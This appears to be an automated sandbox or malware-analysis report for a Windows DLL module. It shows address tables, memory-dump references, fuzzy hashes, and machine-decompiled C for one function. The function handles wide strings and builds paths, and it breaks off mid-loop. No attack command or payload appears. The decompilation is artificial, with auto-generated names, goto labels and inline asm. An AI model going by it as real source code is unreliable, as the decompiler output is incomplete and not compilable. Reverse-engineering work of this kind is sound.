0x6e7a30c4
0x6e7a30ca
0x6e7a30cd
0x6e7a30cf
0x00000000
0x00000000
0x6e7a30d5
0x6e7a30d6
0x6e7a30d7
0x6e7a30db
0x6e7a30df
0x00000000
0x00000000
0x6e7a30e1
0x6e7a30e1
0x00000000
0x6e7a30e1
0x6e7a3164
0x6e7a3167
0x6e7a3169
0x00000000
0x00000000
0x6e7a3173
0x6e7a3176
0x6e7a3182
0x6e7a3182
0x6e7a3185
0x6e7a318c
0x6e7a3190
0x6e7a3192
0x6e7a3192
0x6e7a3194
0x6e7a3196
0x6e7a31af
0x6e7a31bf
0x6e7a31bf
0x6e7a31c5
0x6e7a31c5
0x6e7a31ca
0x6e7a31ce
0x6e7a31d2
0x6e7a31d4
0x00000000
0x00000000
0x6e7a31da
0x6e7a31dd
0x6e7a31df
0x00000000
0x00000000
0x6e7a31e5
0x6e7a31eb
0x6e7a3204
0x6e7a3204
0x6e7a3209
0x6e7a3209
0x6e7a320c
0x6e7a320c
0x6e7a320e
0x6e7a3212
0x6e7a3216
0x6e7a321a
0x6e7a3221
0x6e7a322a
0x6e7a322d
0x6e7a3230
0x6e7a3236
0x6e7a3239
0x6e7a323c
0x6e7a323e
0x00000000
0x00000000
0x6e7a324a
0x6e7a324c
0x6e7a3254
0x6e7a3254
0x6e7a3258
0x6e7a325c
0x6e7a325f
0x6e7a325f
0x6e7a3261
0x00000000
0x00000000
0x6e7a3267
0x6e7a326b
0x6e7a326b
0x6e7a326d
0x6e7a326f
0x6e7a326f
0x6e7a3270
0x00000000
0x00000000
0x6e7a3276
0x6e7a327a
0x00000000
0x00000000
0x6e7a3280
0x6e7a3289
0x6e7a328c
0x6e7a328f
0x6e7a3293
0x6e7a3297
0x6e7a3297
0x6e7a3298
0x6e7a3299
0x6e7a32a0
0x6e7a32a3
0x6e7a32a9
0x6e7a32ac
0x6e7a32ae
0x00000000
0x00000000
0x6e7a32b4
0x6e7a32b7
0x00000000
0x00000000
0x6e7a32b9
0x6e7a32b9
0x6e7a32bd
0x6e7a32c1
0x6e7a32c4
0x6e7a32c4
0x6e7a32c6
0x6e7a32df
0x6e7a32ef
0x6e7a32ef
0x6e7a32f5
0x6e7a32f5
0x6e7a32fa
0x6e7a32fe
0x6e7a3302
0x6e7a3304
0x00000000
0x00000000
0x6e7a330a
0x6e7a330d
0x6e7a330f
0x00000000
0x00000000
0x6e7a3311
0x6e7a3317
0x6e7a332c
0x6e7a332c
0x6e7a3331
0x6e7a3335
0x6e7a3335
0x6e7a3338
0x6e7a3350
0x6e7a3360
0x6e7a3360
0x6e7a3366
0x6e7a3366
0x6e7a336b
0x6e7a336f
0x6e7a3373
0x6e7a3375
0x00000000
0x00000000
0x6e7a337b
0x6e7a337e
0x6e7a3380
0x00000000
0x00000000
0x6e7a3382
0x6e7a3385
0x6e7a338b
0x6e7a33a0
0x6e7a33a0
0x6e7a33a5
0x6e7a33a5
0x6e7a33ab
0x6e7a33ad
0x6e7a33af
0x6e7a33b1
0x6e7a33b3
0x6e7a33b6
0x6e7a33b8
0x6e7a33bb
0x6e7a33be
0x6e7a33c0
0x6e7a33c0
0x6e7a33c2
0x6e7a33c6
0x6e7a3519
0x6e7a3519
0x6e7a3520
0x6e7a3522
0x6e7a3525
0x6e7a3527
0x6e7a3529
0x6e7a3563
0x00000000
0x6e7a3563
0x6e7a352b
0x6e7a352d
0x6e7a3553
0x6e7a3553
0x6e7a3555
0x6e7a3556
0x6e7a355b
0x00000000
0x6e7a355b
0x6e7a352f
0x6e7a3532
0x6e7a3534
0x6e7a3536
0x00000000
0x00000000
0x6e7a3538
0x6e7a3538
0x6e7a353a
0x6e7a353a
0x6e7a353b
0x6e7a3540
0x6e7a3544
0x6e7a3546
0x00000000
0x00000000
0x6e7a3548
0x6e7a354c
0x6e7a354f
0x6e7a3551
0x00000000
0x00000000
0x00000000
0x6e7a3551
0x00000000
0x6e7a353a
0x6e7a33cc
0x6e7a33d0
0x6e7a33d4
0x00000000
0x00000000
0x6e7a33da
0x6e7a33dc
0x6e7a3451
0x6e7a3456
0x6e7a3456
0x6e7a3459
0x6e7a345c
0x6e7a345f
0x6e7a3461
0x6e7a3477
0x6e7a347a
0x6e7a347a
0x6e7a3480
0x6e7a3488
0x6e7a3488
0x6e7a3488
0x6e7a348b
0x6e7a3495
0x6e7a3498
0x6e7a349b
0x6e7a34a1
0x6e7a34a3
0x6e7a34a6
0x6e7a34a8
0x6e7a34aa
0x6e7a34e4
0x00000000
0x6e7a34ac
0x6e7a34ac
0x6e7a34ae
0x6e7a34d7
0x6e7a34d7
0x6e7a34d9
0x6e7a34da
0x6e7a34df
0x6e7a34e7
0x6e7a34ea
0x6e7a34ed
0x6e7a34ef
0x6e7a34ef
0x6e7a34f1
0x00000000
0x00000000
0x6e7a34f7
0x6e7a34fb
0x6e7a3501
0x6e7a3501
0x6e7a3504
0x6e7a3505
0x6e7a3507
0x6e7a3509
0x00000000
0x00000000
0x6e7a350b
0x6e7a350d
0x6e7a356b
0x00000000
0x6e7a356b
0x6e7a350f
0x6e7a350f
0x6e7a3511
0x00000000
0x00000000
0x6e7a34ff
0x6e7a3500
0x6e7a3500
0x6e7a3500
0x6e7a3501
0x6e7a34b0
0x6e7a34b3
0x6e7a34b5
0x6e7a34b7
0x00000000
0x00000000
0x6e7a34b9
0x6e7a34b9
0x6e7a34bb
0x6e7a34bb
0x6e7a34bc
0x6e7a34c1
0x6e7a34c5
0x6e7a34c7
0x00000000
0x00000000
0x6e7a34c9
0x6e7a34cd
0x6e7a34d0
0x6e7a34d2
0x00000000
0x00000000
0x00000000
0x6e7a34d2
0x6e7a34d4
0x00000000
0x6e7a34d4
0x6e7a34aa
0x6e7a3463
0x00000000
0x6e7a3463
0x6e7a33de
0x6e7a33e0
0x6e7a33e4
0x6e7a33e4
0x6e7a33e7
0x6e7a33ff
0x6e7a340f
0x6e7a340f
0x6e7a3415
0x6e7a3415
0x6e7a341a
0x6e7a341e
0x6e7a3422
0x6e7a3424
0x00000000
0x00000000
0x6e7a342a
0x6e7a342d
0x6e7a342f
0x00000000
0x00000000
0x6e7a3431
0x6e7a3437
0x6e7a344c
0x6e7a344c
0x00000000
0x6e7a344c
0x6e7a3439
0x6e7a343d
0x6e7a343d
0x6e7a3441
0x00000000
0x00000000
0x6e7a3443
0x6e7a3444
0x6e7a344a
0x00000000
0x00000000
0x00000000
0x6e7a344a
0x00000000
0x6e7a343d
0x6e7a3574
0x6e7a3577
0x00000000
0x6e7a3577
0x6e7a33eb
0x6e7a33ed
0x6e7a33f1
0x6e7a33f1
0x6e7a33f4
0x6e7a33f4
0x6e7a33f8
0x00000000
0x00000000
0x6e7a33fa
0x6e7a33fb
0x6e7a33fd
0x00000000
0x00000000
0x00000000
0x6e7a33fd
0x00000000
0x6e7a33f4
0x6e7a338d
0x6e7a3391
0x6e7a3391
0x6e7a3395
0x00000000
0x00000000
0x6e7a3397
0x6e7a3398
0x6e7a339e
0x00000000
0x00000000
0x00000000
0x6e7a339e
0x00000000
0x6e7a3391
0x6e7a357e
0x6e7a3581
0x6e7a3584
0x00000000
0x6e7a3584
0x6e7a333c
0x6e7a333e
0x6e7a3342
0x6e7a3342
0x6e7a3345
0x6e7a3345
0x6e7a3349
0x00000000
0x00000000
0x6e7a334b
0x6e7a334c
0x6e7a334e
0x00000000
0x00000000
0x00000000
0x6e7a334e
0x00000000
0x6e7a3345
0x6e7a3319
0x6e7a331d
0x6e7a331d
0x6e7a3321
0x00000000
0x00000000
0x6e7a3323
0x6e7a3324
0x6e7a332a
0x00000000
0x00000000
0x00000000
0x6e7a332a
0x00000000
0x6e7a331d
0x6e7a358b
0x6e7a358e
0x00000000
0x6e7a358e
0x6e7a32c8
0x6e7a32cc
0x6e7a32cc
0x6e7a32ce
0x6e7a32d2
0x6e7a32d4
0x6e7a32d4
0x6e7a32d8
0x00000000
0x00000000
0x6e7a32da
0x6e7a32db
0x6e7a32dd
0x00000000
0x00000000
0x00000000
0x6e7a32dd
0x00000000
0x6e7a32d4
0x6e7a3595
0x6e7a3599
0x6e7a359d
0x6e7a359f
0x00000000
0x00000000
0x6e7a35a5
0x6e7a35a9
0x6e7a35ad
0x6e7a35b1
0x6e7a35b5
0x6e7a35b5
0x6e7a35b7
0x6e7a35b9
0x6e7a35d2
0x6e7a35e2
0x6e7a35e2
0x6e7a35e8
0x6e7a35e8
0x6e7a35ed
0x6e7a35f1
0x6e7a35f5
0x6e7a35f7
0x00000000
0x00000000
0x6e7a35fd
0x6e7a3600
0x6e7a3602
0x00000000
0x00000000
0x6e7a3608
0x6e7a360e
0x6e7a3627
0x6e7a3627
0x6e7a362c
0x6e7a362c
0x6e7a362f
0x6e7a362f
0x6e7a3631
0x6e7a3635
0x6e7a3639
0x6e7a363d
0x6e7a3644
0x6e7a364d
0x6e7a3650
0x6e7a3653
0x6e7a3659
0x6e7a365c
0x6e7a365f
0x6e7a3661
0x00000000
0x00000000
0x6e7a3665
0x6e7a3667
0x6e7a3673
0x6e7a3673
0x6e7a3677
0x6e7a367b
0x6e7a367b
0x6e7a367d
0x00000000
0x00000000
0x00000000
0x6e7a367d
0x6e7a3669
0x6e7a366a
0x6e7a366d
0x00000000
0x00000000
0x00000000
0x6e7a366d
0x6e7a368f
0x6e7a3699
0x6e7a3699
0x6e7a369a
0x00000000
0x00000000
0x6e7a369c
0x6e7a36a5
0x6e7a36aa
0x6e7a36ad
0x6e7a36b1
0x00000000
0x00000000
0x6e7a36b3
0x6e7a36b7
0x6e7a36b7
0x6e7a36b8
0x6e7a36b9
0x6e7a36c3
0x6e7a36c9
0x6e7a36cc
0x6e7a36ce
0x00000000
0x00000000
0x6e7a36d0
0x6e7a36d3
0x00000000
0x00000000
0x00000000
0x6e7a36d5
0x00000000
0x6e7a36b7
0x6e7a3610
0x6e7a3614
0x6e7a3614
0x6e7a3618
0x00000000
0x00000000
0x6e7a361e
0x6e7a361f
0x6e7a3625
0x00000000
0x00000000
0x00000000
0x6e7a3625
0x6e7a36fa
0x6e7a36fa
0x6e7a36fc
0x00000000
0x00000000
0x6e7a3702
0x00000000
0x00000000
0x6e7a3708
0x6e7a370c
0x6e7a3710
0x00000000
0x6e7a3710
0x6e7a3719
0x6e7a3720
0x00000000
0x6e7a3720
0x6e7a35bb
0x6e7a35bf
0x6e7a35c1
0x6e7a35c1
0x6e7a35c3
0x6e7a35c3
0x6e7a35c7
0x00000000
0x00000000
0x6e7a35cd
0x6e7a35ce
0x6e7a35d0
0x00000000
0x00000000
0x00000000
0x6e7a35d0
0x00000000
0x6e7a36de
0x6e7a36de
0x6e7a36e2
0x6e7a36e6
0x6e7a36e6
0x6e7a36ee
0x6e7a36ee
0x6e7a36f2
0x00000000
0x6e7a36f2
0x6e7a3683
0x6e7a3683
0x00000000
0x6e7a3687
0x6e7a324e
0x6e7a324f
0x6e7a3252
0x00000000
0x00000000
0x00000000
0x6e7a3252
0x6e7a3724
0x6e7a372e
0x6e7a372e
0x6e7a372f
0x00000000
0x00000000
0x6e7a3735
0x6e7a373e
0x6e7a3743
0x6e7a3746
0x6e7a374a
0x00000000
0x00000000
0x6e7a3750
0x6e7a3754
0x6e7a3754
0x6e7a3755
0x6e7a3756
0x6e7a3760
0x6e7a3766
0x6e7a3769
0x6e7a376b
0x00000000
0x00000000
0x6e7a376d
0x6e7a3770
0x00000000
0x00000000
0x00000000
0x6e7a3772
0x00000000
0x6e7a3754
0x6e7a31ed
0x6e7a31f1
0x6e7a31f1
0x6e7a31f5
0x00000000
0x00000000
0x6e7a31fb
0x6e7a31fc
0x6e7a3202
0x00000000
0x00000000
0x00000000
0x6e7a3202
0x6e7a3777
0x6e7a3777
0x6e7a3779
0x00000000
0x00000000
0x6e7a377f
0x00000000
0x00000000
0x6e7a3785
0x6e7a3789
0x00000000
0x6e7a3789
0x6e7a3791
0x6e7a3798
0x00000000
0x6e7a3798
0x6e7a3198
0x6e7a319c
0x6e7a319e
0x6e7a319e
0x6e7a31a0
0x6e7a31a0
0x6e7a31a4
0x00000000
0x00000000
0x6e7a31aa
0x6e7a31ab
0x6e7a31ad
0x00000000
0x00000000
0x00000000
0x6e7a31ad
0x00000000
0x6e7a379c
0x6e7a379c
0x6e7a37a0
0x6e7a37a4
0x6e7a37a4
0x00000000
0x6e7a37ac
0x00000000
0x6e7a303b
0x6e7a2fb7
0x6e7a2fba
0x6e7a2fbc
0x6e7a2fbe
0x00000000
0x00000000
0x6e7a2fc0
0x6e7a2fc4
0x6e7a2fc4
0x6e7a2fc6
0x6e7a2fca
0x6e7a2fcd
0x6e7a2fcd
0x6e7a2fce
0x6e7a2fd3
0x6e7a2fd7
0x6e7a2fd9
0x00000000
0x00000000
0x6e7a2fdb
0x6e7a2fdf
0x6e7a2fe2
0x6e7a2fe4
0x00000000
0x00000000
0x00000000
0x6e7a2fe4
0x6e7a2fe6
0x6e7a2fea
0x6e7a2fee
0x00000000
0x6e7a2fee
0x6e7a2fb1
0x6e7a2f6f
0x00000000
0x6e7a2f6f
0x6e7a2eeb
0x6e7a2eeb
0x6e7a2eee
0x6e7a2f06
0x6e7a2f0a
0x6e7a2f16
0x6e7a2f16
0x6e7a2f1c
0x6e7a2f1c
0x6e7a2f21
0x6e7a2f25
0x6e7a2f29
0x6e7a2f2b
0x00000000
0x00000000
0x6e7a2f31
0x6e7a2f34
0x6e7a2f36
0x00000000
0x00000000
0x6e7a2f38
0x6e7a2f3e
0x6e7a2f53
0x6e7a2f53
0x6e7a2f58
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a2f40
0x6e7a2f40
0x6e7a2f40
0x6e7a2f44
0x00000000
0x00000000
0x6e7a2f4a
0x6e7a2f4b
0x6e7a2f51
0x00000000
0x00000000
0x00000000
0x6e7a2f51
0x6e7a37b1
0x6e7a37b1
0x6e7a37b4
0x6e7a37c2
0x6e7a37b6
0x6e7a37b6
0x6e7a37b9
0x6e7a37b9
0x00000000
0x6e7a37b4
0x6e7a37cc
0x6e7a37cf
0x00000000
0x6e7a37cf
0x6e7a2ef2
0x6e7a2ef4
0x6e7a2ef4
0x6e7a2ef7
0x6e7a2ef7
0x6e7a2efb
0x00000000
0x00000000
0x6e7a2f01
0x6e7a2f02
0x6e7a2f04
0x00000000
0x00000000
0x00000000
0x6e7a2f04
0x00000000
0x6e7a2ef7
0x6e7a2ed8
0x00000000
0x6e7a2ed8
0x6e7a2e8e
0x6e7a2eb4
0x6e7a2eb4
0x6e7a2eb6
0x6e7a2eb7
0x6e7a2ebc
0x00000000
0x6e7a2ebc
0x6e7a2e90
0x6e7a2e93
0x6e7a2e97
0x00000000
0x00000000
0x6e7a2e99
0x6e7a2e9b
0x6e7a2e9b
0x6e7a2e9c
0x6e7a2ea1
0x6e7a2ea7
0x00000000
0x00000000
0x6e7a2ea9
0x6e7a2ead
0x6e7a2eb2
0x00000000
0x00000000
0x00000000
0x6e7a2eb2
0x00000000

Strings

@, xrefs: 6E7A2EC8

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction ID: 7afcbb3bce70622134622cd55caccebb0a4385ecfe087f2110474f535652c3e0
Opcode Fuzzy Hash: 115c3439d82789a76028cc64ba03a0b0cd7b01c7d0591427b9fbd30026037de6
Instruction Fuzzy Hash: A7528C319087939BD705CEADC59432EBBE26FC6310F18876DDAA54B3B6D731C8418B82

Uniqueness

Uniqueness Score: -1.00%

Function 6E79D030, Relevance: 2.0, Strings: 1, Instructions: 789
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6E79D030(void* __ecx, signed int* _a4) {
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _t225;
				signed int _t230;
				signed int _t231;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				unsigned int _t267;
				signed int _t272;
				signed int _t277;
				unsigned int _t283;
				signed int _t284;
				signed int* _t286;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t304;
				unsigned int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed int _t313;
				signed int _t316;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t351;
				signed int _t354;
				signed int _t355;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				unsigned int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t374;
				void* _t382;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t390;
				unsigned int _t405;
				signed int _t406;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed short* _t414;
				signed int _t418;
				unsigned int _t419;
				signed int _t421;
				unsigned int _t429;
				void* _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int* _t445;
				unsigned int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t458;
				signed int _t465;
				unsigned int _t467;
				signed int _t468;
				signed int _t471;
				void* _t473;
				void* _t474;

				_t473 = (_t471 & 0xfffffff0) - 0x34;
				E6E79D980(__ecx,  &_v60, 0x2f);
				_t294 = E6E79E7D0( &_v60);
				_t445 = _a4;
				_t316 =  *_t294;
				if(_t316 != 0) {
					_t364 =  *( *( *(_t294 + 4)));
					__eflags = _t364;
					if(_t364 == 0) {
						L37:
						_push(0x80);
						_t418 = E6E791030();
						_t473 = _t473 + 4;
						 *_t418 = 0;
						__eflags =  *_t294 - 1;
						if( *_t294 <= 1) {
							L70:
							 *_t445 = 0;
							_t445[1] = 0;
							__eflags = _t418;
							if(_t418 == 0) {
								L105:
								_push(0x80);
								_t295 = E6E791030();
								_t473 = _t473 + 4;
								_t317 =  *_t445;
								__eflags = _t317;
								if(_t317 == 0) {
									__eflags = 0;
									 *_t295 = 0;
									L113:
									 *_t445 = _t295;
									_t445[1] = 0x40;
									L114:
									_push(2);
									_push(_t418);
									E6E7910B0();
									_t474 = _t473 + 8;
									L115:
									_t419 = _v60;
									_v60 = 0;
									_v52 = 0;
									_t369 = _v56;
									if(_t419 <= 0) {
										L127:
										_push(4);
										_push(_t369);
										E6E7910B0();
										_v56 = 0;
										return _t445;
									}
									_t225 = _t419 >> 1;
									if(_t225 == 0) {
										_t297 = 1;
										L124:
										if(_t297 - 1 < _t419) {
											_t319 =  *((intOrPtr*)(_t369 + _t297 * 4 - 4));
											if( *((intOrPtr*)(_t369 + _t297 * 4 - 4)) != 0) {
												_push(1);
												E6E7987E0(_t319);
												_t369 = _v60;
											}
										}
										goto L127;
									}
									_t298 = 0;
									_t447 = _t225;
									do {
										_t320 =  *((intOrPtr*)(_t369 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + _t298 * 8)) != 0) {
											_push(1);
											E6E7987E0(_t320);
											_t369 = _v60;
										}
										_t321 =  *((intOrPtr*)(_t369 + 4 + _t298 * 8));
										if( *((intOrPtr*)(_t369 + 4 + _t298 * 8)) != 0) {
											_push(1);
											E6E7987E0(_t321);
											_t369 = _v60;
										}
										_t298 = _t298 + 1;
									} while (_t298 < _t447);
									_t445 = _a4;
									_t297 = _t298 + _t298 + 1;
									goto L124;
								}
								__eflags = _t295;
								if(_t295 == 0) {
									L111:
									_push(2);
									_push(_t317);
									E6E7910B0();
									_t473 = _t473 + 8;
									goto L113;
								}
								_t370 =  *_t317 & 0x0000ffff;
								 *_t295 = _t370;
								__eflags = _t370;
								if(_t370 == 0) {
									goto L111;
								}
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_t371 = _t371 + 1;
									_t230 =  *(_t317 + _t371 * 4 - 2) & 0x0000ffff;
									 *(_t295 + _t371 * 4 - 2) = _t230;
									__eflags = _t230;
									if(_t230 == 0) {
										goto L111;
									}
									_t231 =  *(_t317 + _t371 * 4) & 0x0000ffff;
									 *(_t295 + _t371 * 4) = _t231;
									__eflags = _t231;
									if(_t231 != 0) {
										continue;
									}
									goto L111;
								}
								goto L111;
							}
							L71:
							__eflags =  *_t418 & 0x0000ffff;
							if(( *_t418 & 0x0000ffff) == 0) {
								goto L105;
							}
							_t374 = _t418 & 0x0000000f;
							__eflags = _t374;
							if(_t374 == 0) {
								L77:
								asm("pxor xmm0, xmm0");
								_t304 =  ~( ~_t374 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t304;
								while(1) {
									asm("movdqu xmm1, [edi+edx*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ecx, xmm1");
									__eflags = _t316;
									if(_t316 != 0) {
										break;
									}
									_t374 = _t374 + 8;
									__eflags = _t374 - _t304;
									if(_t374 < _t304) {
										continue;
									}
									__eflags = _t304 - 0x7fffffff;
									if(_t304 >= 0x7fffffff) {
										L83:
										_t304 = 0x7fffffff;
										L84:
										_t82 = _t304 + 1; // 0x80000000
										_t232 = _t82;
										__eflags = _t232 - 0x40;
										_t233 =  <=  ? 0x40 : _t232;
										__eflags = _t233;
										if(_t233 > 0) {
											_t326 = (_t233 >> 5 >> 0x1a) + _t233 >> 6;
											_t234 = _t233 & 0x8000003f;
											__eflags = _t234;
											if(_t234 < 0) {
												_t234 = (_t234 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t234;
											}
											__eflags = _t234;
											_t327 = _t326 + (0 | _t234 > 0x00000000);
											_v64 = _t327 << 6;
											_push(_t327 << 7);
											_t235 = E6E791030();
											_t473 = _t473 + 4;
											_t329 =  *_t445;
											__eflags = _t329;
											if(_t329 == 0) {
												__eflags = 0;
												 *_t235 = 0;
												goto L97;
											} else {
												__eflags = _t235;
												if(_t235 == 0) {
													L95:
													_push(2);
													_push(_t329);
													_v68 = _t235;
													E6E7910B0();
													_t235 = _v68;
													_t473 = _t473 + 8;
													L97:
													_t445[1] = _v64;
													 *_t445 = _t235;
													L98:
													_t330 = _t418;
													__eflags = _t235;
													if(_t235 == 0) {
														goto L114;
													}
													_t382 = 0;
													while(1) {
														_t448 =  *_t330 & 0x0000ffff;
														_t382 = _t382 + 1;
														 *_t235 = _t448;
														__eflags = _t304;
														if(_t304 == 0) {
															goto L103;
														}
														__eflags = _t382 - _t304;
														if(_t382 == _t304) {
															_t445 = _a4;
															 *(_t235 + 2) = 0;
															goto L114;
														}
														L103:
														__eflags = _t448;
														if(_t448 == 0) {
															_t445 = _a4;
															goto L114;
														}
														_t235 = _t235 + 2;
														_t330 = _t330 + 2;
														__eflags = _t330;
													}
												}
												_t384 =  *_t329 & 0x0000ffff;
												 *_t235 = _t384;
												__eflags = _t384;
												if(_t384 == 0) {
													goto L95;
												}
												_t385 = 0;
												__eflags = 0;
												while(1) {
													_t385 = _t385 + 1;
													_t449 =  *(_t329 + _t385 * 4 - 2) & 0x0000ffff;
													 *(_t235 + _t385 * 4 - 2) = _t449;
													__eflags = _t449;
													if(_t449 == 0) {
														break;
													}
													_t450 =  *(_t329 + _t385 * 4) & 0x0000ffff;
													 *(_t235 + _t385 * 4) = _t450;
													__eflags = _t450;
													if(_t450 != 0) {
														continue;
													}
													break;
												}
												_t445 = _a4;
												goto L95;
											}
										}
										_t235 = 0;
										goto L98;
									} else {
										goto L81;
									}
									while(1) {
										L81:
										__eflags =  *(_t418 + _t304 * 2) & 0x0000ffff;
										if(( *(_t418 + _t304 * 2) & 0x0000ffff) == 0) {
											goto L84;
										}
										_t304 = _t304 + 1;
										__eflags = _t304 - 0x7fffffff;
										if(_t304 < 0x7fffffff) {
											continue;
										}
										goto L83;
									}
									goto L84;
								}
								asm("bsf ebx, ecx");
								_t304 = (_t304 >> 1) + _t374;
								goto L84;
							}
							_t304 = 0;
							__eflags = _t374 & 0x00000001;
							if((_t374 & 0x00000001) != 0) {
								goto L81;
							}
							_t374 =  ~_t374 + 0x10 >> 1;
							__eflags = _t374;
							while(1) {
								_t316 =  *(_t418 + _t304 * 2) & 0x0000ffff;
								__eflags = _t316;
								if(_t316 == 0) {
									goto L84;
								}
								_t304 = _t304 + 1;
								__eflags = _t304 - _t374;
								if(_t304 < _t374) {
									continue;
								}
								goto L77;
							}
							goto L84;
						}
						_v40 = 0x40;
						L39:
						__eflags = 1;
						_t389 = 1;
						_t241 = _t294;
						asm("pxor xmm0, xmm0");
						_t306 = 1;
						do {
							__eflags = _t418;
							if(_t418 == 0) {
								_t390 = 0;
								L205:
								_v32 = _t241;
								_t451 = _t390;
								L54:
								_t48 = _t451 + 2; // -2147483652
								_t331 = _t48;
								__eflags = _t331 - 0x40;
								_t332 =  <=  ? 0x40 : _t331;
								__eflags = _t332 - _v40;
								if(_t332 <= _v40) {
									L66:
									_t316 = 0;
									 *((short*)(_t418 + _t451 * 2)) = 0x5c;
									 *((short*)(_t418 + 2 + _t451 * 2)) = 0;
									_t452 = _v32;
									_t389 =  *( *( *((intOrPtr*)(_t452 + 4)) + _t306 * 4));
									__eflags = _t389;
									if(_t389 == 0) {
										goto L68;
									}
									_t316 =  *_t389 & 0x0000ffff;
									__eflags = _t316;
									if(_t316 != 0) {
										__eflags = _t389 - _t418;
										if(_t389 == _t418) {
											goto L68;
										}
										_t245 = _t389 & 0x0000000f;
										__eflags = _t245;
										if(_t245 == 0) {
											L134:
											asm("pxor xmm1, xmm1");
											_t465 =  ~( ~_t245 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t465;
											while(1) {
												asm("movdqu xmm0, [edx+eax*2]");
												asm("pcmpeqw xmm0, xmm1");
												asm("pmovmskb ecx, xmm0");
												__eflags = _t316;
												if(_t316 != 0) {
													break;
												}
												_t245 = _t245 + 8;
												__eflags = _t245 - _t465;
												if(_t245 < _t465) {
													continue;
												}
												__eflags = _t465 - 0x7fffffff;
												if(_t465 >= 0x7fffffff) {
													L140:
													_t465 = 0x7fffffff;
													L141:
													__eflags = _t418;
													if(_t418 == 0) {
														_t246 = 0;
														L155:
														_t149 = _t246 + 1; // 0x80000000
														_t247 = _t465 + _t149;
														__eflags = _t247;
														if(_t247 != 0) {
															__eflags = _t247 - 0x40;
															_t248 =  <=  ? 0x40 : _t247;
															__eflags = _t248 - _v40;
															if(_t248 <= _v40) {
																L173:
																_t249 = _t418;
																__eflags = _t418;
																if(_t418 == 0) {
																	L204:
																	_t241 = _v32;
																	_t390 = 0;
																	_t306 = _t306 + 1;
																	__eflags = _t306 -  *_t241;
																	if(_t306 >=  *_t241) {
																		_t445 = _a4;
																		 *_t445 = 0;
																		_t445[1] = 0;
																		goto L105;
																	}
																	goto L205;
																}
																_t334 =  *_t418 & 0x0000ffff;
																L175:
																__eflags = _t334;
																if(_t334 == 0) {
																	L180:
																	_t335 = _t249;
																	__eflags = _t465;
																	if(__eflags != 0) {
																		if(__eflags <= 0) {
																			L187:
																			_t316 = _v32;
																			_t389 = 0;
																			 *_t249 = 0;
																			_t306 = _t306 + 1;
																			__eflags = _t306 -  *_t316;
																			if(_t306 <  *_t316) {
																				L42:
																				_t243 = _t418 & 0x0000000f;
																				__eflags = _t243;
																				if(_t243 == 0) {
																					L47:
																					asm("pxor xmm1, xmm1");
																					_t458 =  ~( ~_t243 + 0x00000007 & 0x00000007) + 0x7fffffff;
																					__eflags = _t458;
																					while(1) {
																						asm("movdqu xmm0, [edi+eax*2]");
																						asm("pcmpeqw xmm0, xmm1");
																						asm("pmovmskb edx, xmm0");
																						__eflags = _t389;
																						if(_t389 != 0) {
																							break;
																						}
																						_t243 = _t243 + 8;
																						__eflags = _t243 - _t458;
																						if(_t243 < _t458) {
																							continue;
																						}
																						__eflags = _t458 - 0x7fffffff;
																						if(_t458 >= 0x7fffffff) {
																							L53:
																							_t451 = 0x7fffffff;
																							goto L54;
																						} else {
																							goto L51;
																						}
																						while(1) {
																							L51:
																							__eflags =  *(_t418 + _t458 * 2) & 0x0000ffff;
																							if(( *(_t418 + _t458 * 2) & 0x0000ffff) == 0) {
																								break;
																							}
																							_t458 = _t458 + 1;
																							__eflags = _t458 - 0x7fffffff;
																							if(_t458 < 0x7fffffff) {
																								continue;
																							}
																							goto L53;
																						}
																						L196:
																						__eflags = _t451 - 0xfffffffe;
																						if(_t451 == 0xfffffffe) {
																							 *_t418 = 0;
																						}
																						goto L54;
																					}
																					asm("bsf esi, edx");
																					_t451 = (_t458 >> 1) + _t243;
																					goto L196;
																				}
																				_t458 = 0;
																				__eflags = _t243 & 0x00000001;
																				if((_t243 & 0x00000001) != 0) {
																					goto L51;
																				}
																				_t243 =  ~_t243 + 0x10 >> 1;
																				__eflags = _t243;
																				while(1) {
																					_t389 =  *(_t418 + _t458 * 2) & 0x0000ffff;
																					__eflags = _t389;
																					if(_t389 == 0) {
																						goto L196;
																					}
																					_t458 = _t458 + 1;
																					__eflags = _t458 - _t243;
